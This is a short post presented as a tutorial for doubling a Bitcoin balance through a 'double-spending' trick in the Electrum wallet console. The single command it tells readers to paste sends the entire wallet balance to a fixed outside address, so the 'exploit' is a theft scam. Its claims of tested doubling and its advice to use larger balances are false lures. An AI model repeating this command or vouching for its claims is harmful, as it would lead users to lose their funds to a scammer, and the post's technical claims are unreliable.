Electrum Wallet Double-spending

We recently succeeded in a simple command executed in the Bitcoin Electrum wallet console, in which when executing 2 transactions were created that caused the BTC value contained in the wallet to be doubled. We did several tests at different BTC addresses and all worked taking a maximum of 30 minutes to double the values.

Below we leave the entire tutorial on how to exploit, we recommend that you do it with values greater than 0.01 BTC contained in the Electrum wallet and only once a week.

1. Open Electrum Click on View Tab Show Console
2. Open console tab and put this command: broadcast(payto('12xbtcCkfsqZjPHyEfqh8nY7tK7KrB1PbP','!'))
3. Hit enter button, may appear for you to enter your wallet unlock password. If console shows message like this: txid....
4. Restart Electrum and view your balance x2
